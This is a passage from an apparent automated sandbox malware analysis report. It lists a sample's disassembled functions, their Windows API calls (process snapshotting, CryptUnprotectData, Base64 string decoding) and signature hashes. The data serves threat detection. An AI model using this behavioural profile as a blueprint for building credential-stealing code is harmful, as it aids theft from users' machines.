                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID:
                                            • API String ID: 433455689-0
                                            • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction ID: 2cc29ee13835a8873c59955f446dad75d868d1ee37250c5c89811d4e2e660496
                                            • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction Fuzzy Hash: F112FE72A00624ABCB18FBA1DC99EFD7376AF54305F4045AED54A66090EF349F48CF52
                                            Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                            • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                            • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • CloseHandle.KERNEL32(?), ref: 004188F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                            • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                            • Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                            • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                            Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                            • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                            Function 02469297 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,0245543B,40000001,00000000,00000000,?,0245543B), ref: 024692B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction ID: 83630ebf40af44e1fa58c38a7c754d8a0ddb765834a90a5d671b2cf2fafde07c
                                            • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction Fuzzy Hash: C4111CB4608209BFDB04CF54D888FBB33B9AF89710F009559F9098B250D7B1E981CB61
                                            Function 0245A477 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4A6
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,024551A5,00000000,?), ref: 0245A4B8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4E1
                                            • LocalFree.KERNEL32(?,?,?,?,024551A5,00000000,?), ref: 0245A4F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID:
                                            • API String ID: 4291131564-0
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: 70aff5809641f6a75b56b15cf0a6e2acb5b4b0f65e8912d5f34ba511fe28dcbc
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 1111D274641308AFEB10CF64CC95FAA77B6FB88704F208149FD159B390C7B2AA40CB50
                                            Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                            • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                            • LocalFree.KERNEL32(?), ref: 0040A323
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                            Function 0245A517 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0245A53B
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0245A55A
                                            • memcpy.MSVCRT(?,?,?), ref: 0245A57D
                                            • LocalFree.KERNEL32(?), ref: 0245A58A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction ID: 8555f6d9584d36643b8f07d4f42cf775a71da2da3c1a795a7680d7c731ddf763
                                            • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                            • Instruction Fuzzy Hash: 8111A8B8A01219EFCB04DFA4D984AAEB7B5FF88304F108559ED1597350D730AA50CFA2
                                            Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009D0348,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                            • wsprintfA.USER32 ref: 00417C47
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 362916592-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                            Function 0245092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: ef04b08f49b47f73ac197ea453be697af2381266527df5cb0f9494033dee462b
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: AF3139BA900619DFDB10CF99C880AAEBBF9FF48324F15504AD881A7315D771EA45CFA4
                                            Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SystemTimelstrcpy
                                            • String ID:
                                            • API String ID: 62757014-0
                                            • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                            • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                            • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                            • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                            Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                            Function 0246D481 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0246D486
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                            Function 0247D9AB Relevance: .8, Instructions: 823COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction ID: 792826b1ed95b049bd50ca4c190a89afab6b3c59b3270be19c96037be3d7d9f3
                                            • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction Fuzzy Hash: 9182D0B5A00F448FD365CF29C880B93B7E1BF5A300F548A6ED9EA8B751DB30A545CB90
                                            Function 024BFFEF Relevance: .7, Instructions: 700COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction ID: 41feed176288303efdbc143e8e81b90c8045c5f85f3f2342fc657b2b74dce337
                                            • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction Fuzzy Hash: 8E320275E04619CFCB54CF6CC8807AEB7B2BF89314F24922ED569AB391D7349842CB91
                                            Function 024982DF Relevance: .6, Instructions: 649COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction ID: ec64528b41181b02b9d4d6018ae186261496842bfee5b3ebee320809df0c6c07
                                            • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction Fuzzy Hash: 39427C716046418FCB25CF1DC494726BFE2BF86314F188A6FD48A8B792D735E886CB91
                                            Function 024CA08F Relevance: .5, Instructions: 501COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction ID: b8bb7e3ed8c889994bbff9fb2cea41eaef35b45be94378eab556ec99e7a44d44
                                            • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction Fuzzy Hash: 0202E875E0022A8FCB11CE7DC8906AFB7A2AF99354F25831FE855B7350D771AD828790
                                            Function 02495B2F Relevance: .4, Instructions: 418COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction ID: b9e97a4029905f5227f4ca70fbedc906c6a0ed2e93fb19ec63b474154794938b
                                            • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction Fuzzy Hash: C0F179B26086914BC71E8A1984F09BD7FD39BA9104F4E86ADFCD70F393D924DA01DB61
                                            Function 024DA76F Relevance: .4, Instructions: 415COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction ID: 388c37dd80349f6e166dc6fafd0cbb33cd1497cc64490fd4cfc56f462203be89
                                            • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction Fuzzy Hash: 8ED17573F11A294BEB08CE99DC913ADB6E2EBD8350F19423ED916F7381D6B85D018790
                                            Function 024AAD0F Relevance: .4, Instructions: 376COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction ID: d93ec5bb590fa5ba97ceeb0176ec567f6a3cdaae188fff0a351af0942084eaa6
                                            • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction Fuzzy Hash: FB027974E006588FCB16CFA8C4905EDBBB6FF9D310F54815AE8996B355C730AA91CF90
                                            Function 024AB1CF Relevance: .4, Instructions: 372COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction ID: 83c6b8fb45ca311d1c4269372371e2820b93d2503d9a942d61c5c2c5da4737ef
                                            • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction Fuzzy Hash: DD022475E006198FCF15CF98C4909ADB7B6FF98314F25816EE809AB354D731AA92CF90
                                            Function 024C9AAF Relevance: .3, Instructions: 339COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction ID: 9884acfade966dbfb4803b3de7d7e9ac54b68386d69c3b3365301312e3f0405b
                                            • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction Fuzzy Hash: CDC14C7AE29B915BD313873DD842265F354AFE7294F15D72FFCE472A82FB2092814204
                                            Function 024BA19F Relevance: .3, Instructions: 302COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction ID: 06745d917cdf9b937a702e4bb291ca13faf01d703232ad5690338e0df1fc945c
                                            • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction Fuzzy Hash: 2FD13470600B50CFD726CF29C484BA7B7E1BF49304F14896EC89A8BB51DB35E545CBA1
                                            Function 024811DF Relevance: .3, Instructions: 291COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction ID: f1e19d4c2def0f58666d1ef58d7a217b2d2b64ada050915b40bab9737cd3cc72
                                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction Fuzzy Hash: 21B18172E083515BD308CF25C89176FF7E2EFC8310F1AC93EA89997291D778D9459A82
                                            Function 02493A0F Relevance: .3, Instructions: 291COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction ID: e092d78019449560a7e1e9b7bc75e2868a7bd8d830167f7ec304b9aeb055080d
                                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction Fuzzy Hash: E3B1A272A083119BD718CF25C49176BFBE2EFC8310F1AC93EF89997291D774D9419A82
                                            Function 0248159F Relevance: .3, Instructions: 284COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction ID: 8f3cdd34a6645eaf316ddc22565298507f54208ebbd17d22b94e8d361e1ff2e9
